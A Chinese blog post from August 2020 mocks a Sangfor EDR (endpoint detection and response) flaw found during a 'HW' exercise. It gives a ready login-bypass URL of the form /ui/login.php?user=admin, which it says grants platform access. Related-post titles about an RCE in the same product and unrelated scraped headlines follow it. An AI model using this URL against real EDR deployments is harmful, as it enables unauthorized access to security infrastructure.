可能大家都有所耳闻,行动结束了。

当时是众说纷纭,有说甲方扛不住的,有说是红方的钓鱼信息的。刚开始我也以为是红队故意发的消息。

还有民间传言,各方猜测,各位吃瓜群众简直是云里雾里,到现在仍然是未知。

可是,这并不影响大佬们对此次HW行动的神级操作。

就在今天(2020.8.20)凌晨左右(高手一般都是在夜深人静的时候行动)!

SXF的设备又。。。。哎,出现幺蛾子了。还是那个熟悉的EDR,老朋友了害。

不多说了,直接上payload:

payload: https://ip/ui/login.php?user=任意发挥

比如说:

payload: https://10.0.0.12/ui/login.php?user=admin

竟然直接可以登录平台!简直是滑天下之大稽。

作为安全公司,内心的千军万马肯定是奔腾而过!

源码上一张大佬的:

吐槽如下:

SXF:

关于此次活动:

1.24字社会主义核心价值观

2.没有网络安全就没有国家安全

3.各界高手、精英统一战线维护国家网络安全。

信服的不屈之心--终端检测响应平台漏洞再次爆发!相关推荐

  1. 深信服终端检测响应平台EDR-远程命令执行漏洞

    1.漏洞描述 深信服终端检测响应平台EDR存在远程命令执行漏洞,通过远程访问目标文件,造成远程命令执行,获取服务器完全控制权限. 2.资产查找 Fofa: app="深信服-终端检测响应平台 ...

  2. 深信服 EDR终端检测响应平台 0day RCE 漏洞

    0x01 前言 昨天睡得正香,突然公司售前就呼来电话,问某某edr出现啥问题了,然后我就给他讲了一遍,这个月太忙了,没时间写博客,今天继续来水一篇. 其次大哥来波最真挚的简介: 深信服终端检测响应平台 ...

  3. 某信服终端检测响应平台任意用户登录

    深|信服终端检测响应平台(EDR)任意用户登录漏洞 废话不多说,赶紧下线整改吧.. 特殊时期,没事别乱尝试. == 请勿用于攻击破坏 == payload:https://ip:port/ui/log ...

  4. 某信服EDR终端检测响应平台RCE漏洞

    前言: 这个平台是干嘛的,这里就不废话了,刚好赶上了护网期间爆出来的,回头就被告知护网结束,这里简单复现一下. 复现: 第一步:通过fofa搜索语法title="终端检测响应平台" ...

  5. 绿盟安全事件响应观察漏洞频繁爆发

    漏洞频繁爆发 系统或应用的安全疏漏.安全人员对利用方式的公开.黑客对 PoC 恶意散播等均有可能导致 0day 漏洞的爆发.2019 年,绿盟科技监测到网络上出现较多的 0day 漏洞公开信息,根据众 ...

  6. 深信服EDR终端检测平台-RCE漏洞复现

    ​昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE 自己也来看看. 简介: EDR简介(来自官方): 终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安 ...

  7. 深信服EDR终端响应平台

    深信服EDR终端响应平台 一.EDR介绍:终端检测响应平台 1.终端安全由传统防病毒向EPP+EDR融合演进 EPP解决已知威胁,EDR解决未知威胁 EPP融合EDR构建下一代终端安全 2.四阶段模型 ...

  8. 认识XDR-扩展威胁检测与响应平台

    近年安全圈XDR的概念非常火,是近几年热点的安全技术之一,究竟什么是XDR,XDR核心能力是什么?能够解决什么问题,XDR与EDR.NDR关系和区别又是什么?让我们带着这些问题一起来认识一下XDR. ...

  9. 网络安全应急响应-终端检测与响应技术

    网络安全应急响应专题文章: 1. 网络安全应急响应-日志分析技术 2. 网络安全应急响应-流量分析技术 3. 网络安全应急响应-恶意代码分析技术 4. 网络安全应急响应-终端检测与响应技术 5. 网络 ...

最新文章

  1. usaco ★Bessie Come Home 回家
  2. JDK, JRE 和JVM的区别
  3. JVM - 常见的JVM种类
  4. unix网络编程——ioctl 函数的用法详解
  5. c语言中用于判断ch是否是字符的表达式,最新C语言复习题集资料
  6. Kubernetes—StatefulSet部署有状态应用详解(二十四)
  7. 吴恩达机器学习练习3:Logistic regression(Feedforward propagation neural networks)
  8. android马赛克代码,android图片马赛克 mosaic
  9. iOS NSNumber转化NSString之description
  10. C# 基础知识-09----.NET中SpecialFolder 类
  11. 小D课堂 - 零基础入门SpringBoot2.X到实战_第2节 SpringBoot接口Http协议开发实战_11、SpringBoot2.x目录文件结构讲解...
  12. python爬虫抖音主播_Python 爬取抖音视频
  13. 小福利,python内置map函数和lambda函数运用
  14. 云端体验鸿蒙,AI加持的另类彩电之华为智慧屏带你体验鸿蒙
  15. scrum立会报告+燃尽图(第三周第二次)
  16. 计算机如何修改用户名和密码忘了怎么办,电脑用户名密码忘记怎么办
  17. 【程序人生】互联网岗位分工;互联网开发流程;职责分工
  18. boostraptable 表格数据未刷新
  19. IoT物联网设备数据安全解决方案
  20. 【Ybt OJ】[数学基础 第2章] 质数与约数

热门文章

  1. linux命令 gedit,使用linux的gedit命令GNOME桌面的文本编辑器
  2. Windows一键更换系统字体noMeiryoUI 2.41
  3. 南航计算机学院陈兵,南京航空航天大学计算机科学与技术学院人工智能学院陈兵教授课题组2020年5月招聘3名博士后(计算机科学与技术)...
  4. 抖音旅游号视频文案技巧
  5. 六行python代码的爱心曲线
  6. VC++ cpp-httplib
  7. rocksdb性能mysql_mysql rocksdb使用报告
  8. 这样做,可以让PDF阅读最优化!
  9. 120xa变频器调试参数_最全的变频器基本参数的调试都在这了,看过的电工都学会了!...
  10. 图像拼接小实验开发日志和笔记